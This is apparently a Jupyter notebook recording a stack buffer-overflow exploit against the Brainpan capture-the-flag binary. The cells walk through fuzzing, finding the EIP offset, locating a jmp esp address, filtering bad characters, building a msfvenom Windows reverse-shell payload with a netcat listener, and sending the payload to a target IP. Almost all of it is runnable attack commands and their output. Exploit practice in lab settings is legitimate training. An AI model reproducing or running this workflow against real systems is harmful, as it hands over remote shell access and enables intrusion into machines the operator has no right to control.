# Crash Target:

"c" means go in winedbg

In [2]:
!echo Run this:
!echo winedbg brainpan.exe

Run this:
winedbg brainpan.exe


In [2]:
from web_footprinting_utils import show_term

show_term("10.10.232.141")

In [8]:
!python3 -c "print('A'*9999)" | ncat 127.0.0.1 9999

_|                            _|                                        
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                          
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                              

                          >> ^C


# Generate Cyclic Pattern:

In [9]:
!ragg2 -P 9999 -r | ncat 127.0.0.1 9999

_|                            _|                                        
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                          
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                              

                          >> 

# Locate EIP Offset:

insert EIP addr:

In [11]:
EIP = "43413243"
!ragg2 -q 0x{EIP}

Little endian: 524
Big endian: -1


In [12]:
offset = 524

# Overwrite EIP and ESP:

In [14]:
!printf "BBBBCCCCDDDD" > payload-suffix.txt
!ragg2 -P {offset} -r -C payload-suffix.txt | ncat 127.0.0.1 9999

_|                            _|                                        
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                          
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                              

                          >> ^C


# Locate JMPs to ESP:

In [51]:
!echo Remember to copy first line, not second!
!r2 brainpan.exe -c "/ao jmp esp;"

Remember to copy first line, not second!
0x311712f3   # 2: jmp esp
^C33m[0x31171280]> 
[0x31171280]> 
[0x31171280]> 

In [52]:
esp_raw = "0x311712f3"[-8:]
esp_chunks = reversed([esp_raw[x:x+2] for x in range(0, len(esp_raw), 2)])
esp_str = ("\\x"+"\\x".join(esp_chunks))

print(esp_str)

\xf3\x12\x17\x31


In [35]:
# esp_backwards = "".join(list(reversed(esp_forwards))) # Little endian

# Create Badchar Payload:

Make sure to put jmp location in little endian:

In [53]:
!python3 -c "print('a' * 524, end='')" > payload.txt
!printf "\xf3\x12\x17\x31" >> payload.txt

# Filter Badchars:

In [ ]:
def get_goodchars(badchars=""):
    bytearray_value = ""
    
    human_readable = bytes(badchars, encoding="unicode-escape").decode("ascii")
    badints = [int(x, 16) for x in human_readable.split("\\\\x")[1:]]
    print(human_readable, badints)
    
    for x in range(1, 256):
        if x in badints:
            continue
        else:
            bytearray_value += "\\x" + "{:02x}".format(x)
    bytearray_bytes =bytes(bytearray_value, encoding='ascii').decode('unicode_escape')
    return bytearray_bytes

In [ ]:
bytearray_value = get_goodchars()
print(bytearray_value)

In [ ]:
cat payload.txt chars.txt | ncat 127.0.0.1 9999

In winedbg:

In [ ]:
hexdump -C payload.txt

In [ ]:
info stack 32

In [ ]:
badchars = "\x00\x09\x0d\x0a\x20\xff"

Make sure it matches hexdump! Enter differences into badchars and try again

# Create Local Payload:

Make sure to insert badchars from above:

In [45]:
!ip a

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc mq state UP group default qlen 1000
    link/ether 02:39:1a:04:a7:9d brd ff:ff:ff:ff:ff:ff
    inet 10.10.232.141/16 brd 10.10.255.255 scope global dynamic eth0
       valid_lft 3120sec preferred_lft 3120sec
    inet6 fe80::39:1aff:fe04:a79d/64 scope link 
       valid_lft forever preferred_lft forever


In [44]:
!msfvenom -p windows/shell_reverse_tcp LHOST=10.10.232.141 LPORT=7777 EXITFUNC=thread -f raw -b "\x00\x09\x0d\x0a\x20\xff" -n 32 > payload_suffix.txt

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Successfully added NOP sled of size 32 from x86/single_byte
Payload size: 383 bytes



In [38]:
!echo Run this:
!echo rlwrap nc -lvnp 7777

Run this:
rlwrap nc -lvnp 7777


In [54]:
!cat payload.txt payload_suffix.txt | ncat 127.0.0.1 9999

_|                            _|                                        
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                          
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                              

                          >> 

# Create Final Payload:

In [ ]:
LHOST = ""


In [ ]:
!msfvenom -p windows/shell_reverse_tcp LHOST={LHOST} LPORT=7777 EXITFUNC=thread -f raw -b "\x00\x09\x0d\x0a\x20\xff" -n 32 > payload_suffix.txt

In [ ]:
!echo rlwrap nc -lvnp 7777

In [58]:
TARGET = "10.10.67.161"

In [60]:
!cat payload.txt payload_suffix.txt | ncat {TARGET} 9999

Ncat: Connection refused.
